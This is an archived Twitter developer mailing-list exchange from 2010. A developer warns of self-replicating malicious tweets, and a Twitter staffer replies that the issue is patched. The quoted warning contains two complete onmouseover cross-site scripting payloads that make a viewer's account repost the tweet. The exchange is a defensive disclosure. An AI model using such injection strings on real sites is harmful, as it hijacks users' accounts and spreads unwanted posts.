Patched: http://status.twitter.com/post/1161435117/xss-attack-identified-and-patched
Thanks for the warning. Taylor On Tue, Sep 21, 2010 at 5:21 AM, Fabian Schlenz <m...@fabianonline.de> wrote: > Hello. > > There are some malicious tweets coming through in my timeline. The texts of > these tweets are for example: > > http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" > style="color:#000;background:#000;/ > > or > > http://t.co/@"onmouseover="document.getElementById('status').value='RT > MoiMrJack';$('.status-update-form').submit();"font-size:500pt;/ > > (so some kind of self-replicating tweet). IDs of some affected tweets: > 25111539789, 25105308878. > > I do hope twitter is already aware of this Problem, since the official > twitter pages are affected, too... But if your client is affected, you > should think about hardening it against this attack (mine was affected too, > but luckily I'm the only user of it). > > > Regards, > Fabian Schlenz > > -- > Twitter developer documentation and resources: http://dev.twitter.com/doc > API updates via Twitter: http://twitter.com/twitterapi > Issues/Enhancements Tracker: > http://code.google.com/p/twitter-api/issues/list > Change your membership to this group: > http://groups.google.com/group/twitter-development-talk?hl=en > -- Twitter developer documentation and resources: http://dev.twitter.com/doc API updates via Twitter: http://twitter.com/twitterapi Issues/Enhancements Tracker: http://code.google.com/p/twitter-api/issues/list Change your membership to this group: http://groups.google.com/group/twitter-development-talk?hl=en